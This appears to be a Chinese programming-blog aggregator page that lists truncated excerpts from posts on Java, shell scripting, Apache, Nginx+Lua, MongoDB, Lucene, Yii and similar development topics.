            今天遇到一个小需求:由于java.util.Properties读取属性文件时会忽略注释,当写回去的时候,注释都没了。恰好一个项目中的配置文件会在部署后被某个Java程序修改一下,但修改了之后注释全没了,可能会给以后的参数调整带来困难。所以要解决这个问题。     &nb
  • 读《研磨设计模式》-代码笔记-外观模式-Facade bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* * 百度百科的定义: * Facade(外观)模式为子系统中的各类(或结构与方法)提供一个简明一致的界面, * 隐藏子系统的复杂性,使子系统更加容易使用。他是为子系统中的一组接口所提供的一个一致的界面 * * 可简单地
  • After Effects教程收集 cherishLC After Effects
    1、中文入门 http://study.163.com/course/courseMain.htm?courseId=730009 2、videocopilot英文入门教程(中文字幕) http://www.youku.com/playlist_show/id_17893193.html 英文原址: http://www.videocopilot.net/basic/ 素
  • Linux Apache 安装过程 crabdave apache
    Linux Apache 安装过程   下载新版本: apr-1.4.2.tar.gz(下载网站:http://apr.apache.org/download.cgi) apr-util-1.3.9.tar.gz(下载网站:http://apr.apache.org/download.cgi) httpd-2.2.15.tar.gz(下载网站:http://httpd.apac
  • Shell学习 之 变量赋值和引用 daizj shell变量引用赋值
    本文转自:http://www.cnblogs.com/papam/articles/1548679.html Shell编程中,使用变量无需事先声明,同时变量名的命名须遵循如下规则: 首个字符必须为字母(a-z,A-Z) 中间不能有空格,可以使用下划线(_) 不能使用标点符号 不能使用bash里的关键字(可用help命令查看保留关键字) 需要给变量赋值时,可以这么写:
  • Java SE 第一讲(Java SE入门、JDK的下载与安装、第一个Java程序、Java程序的编译与执行) dcj3sjt126com javajdk
    Java SE 第一讲: Java SE:Java Standard Edition Java ME: Java Mobile Edition Java EE:Java Enterprise Edition Java是由Sun公司推出的(今年初被Oracle公司收购)。 收购价格:74亿美金 J2SE、J2ME、J2EE JDK:Java Development
  • YII给用户登录加上验证码 dcj3sjt126com yii
    1、在SiteController中添加如下代码: /** * Declares class-based actions. */ public function actions() { return array( // captcha action renders the CAPTCHA image displ
  • Lucene使用说明 dyy_gusi Lucenesearch分词器
    Lucene使用说明 1、lucene简介 1.1、什么是lucene     Lucene是一个全文搜索框架,而不是应用产品。因此它并不像baidu或者googleDesktop那种拿来就能用,它只是提供了一种工具让你能实现这些产品和功能。 1.2、lucene能做什么     要回答这个问题,先要了解lucene的本质。实际
  • 学习编程并不难,做到以下几点即可! gcq511120594 数据结构编程算法
    不论你是想自己设计游戏,还是开发iPhone或安卓手机上的应用,还是仅仅为了娱乐,学习编程语言都是一条必经之路。编程语言种类繁多,用途各 异,然而一旦掌握其中之一,其他的也就迎刃而解。作为初学者,你可能要先从Java或HTML开始学,一旦掌握了一门编程语言,你就发挥无穷的想象,开发 各种神奇的软件啦。 1、确定目标 学习编程语言既充满乐趣,又充满挑战。有些花费多年时间学习一门编程语言的大学生到
  • Java面试十问之三:Java与C++内存回收机制的差别 HNUlanwei javaC++finalize()堆栈内存回收
    大家知道, Java 除了那 8 种基本类型以外,其他都是对象类型(又称为引用类型)的数据。 JVM 会把程序创建的对象存放在堆空间中,那什么又是堆空间呢?其实,堆( Heap)是一个运行时的数据存储区,从它可以分配大小各异的空间。一般,运行时的数据存储区有堆( Heap)和堆栈( Stack),所以要先看它们里面可以分配哪些类型的对象实体,然后才知道如何均衡使用这两种存储区。一般来说,栈中存放的
  • 第二章 Nginx+Lua开发入门 jinnianshilongnian nginxlua
    Nginx入门 本文目的是学习Nginx+Lua开发,对于Nginx基本知识可以参考如下文章: nginx启动、关闭、重启 http://www.cnblogs.com/derekchen/archive/2011/02/17/1957209.html agentzh 的 Nginx 教程 http://openresty.org/download/agentzh-nginx-tutor
  • MongoDB windows安装 基本命令 liyonghui160com
      windows安装    安装目录:   D:\MongoDB\   新建目录   D:\MongoDB\data\db   4.启动进城:   cd D:\MongoDB\bin   mongod -dbpath D:\MongoDB\data\db   &n
  • Linux下通过源码编译安装程序 pda158 linux
    一、程序的组成部分   Linux下程序大都是由以下几部分组成:   二进制文件:也就是可以运行的程序文件   库文件:就是通常我们见到的lib目录下的文件   配置文件:这个不必多说,都知道   帮助文档:通常是我们在linux下用man命令查看的命令的文档    二、linux下程序的存放目录   linux程序的存放目录大致有三个地方:   /etc, /b
  • WEB开发编程的职业生涯4个阶段 shw3588 编程Web工作生活
    觉得自己什么都会 2007年从学校毕业,凭借自己原创的ASP毕业设计,以为自己很厉害似的,信心满满去东莞找工作,找面试成功率确实很高,只是工资不高,但依旧无法磨灭那过分的自信,那时候什么考勤系统、什么OA系统、什么ERP,什么都觉得有信心,这样的生涯大概持续了约一年。 根本不是自己想的那样 2008年开始接触很多工作相关的东西,发现太多东西自己根本不会,都需要去学,不管是asp还是js,
  • 遭遇jsonp同域下变作post请求的坑 vb2005xu jsonp同域post
    今天迁移一个站点时遇到一个坑爹问题,同一个jsonp接口在跨域时都能调用成功,但是在同域下调用虽然成功,但是数据却有问题. 此处贴出我的后端代码片段 $mi_id = htmlspecialchars(trim($_GET['mi_id '])); $mi_cv = htmlspecialchars(trim($_GET['mi_cv ']));  贴出我前端代码片段: $.aj
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他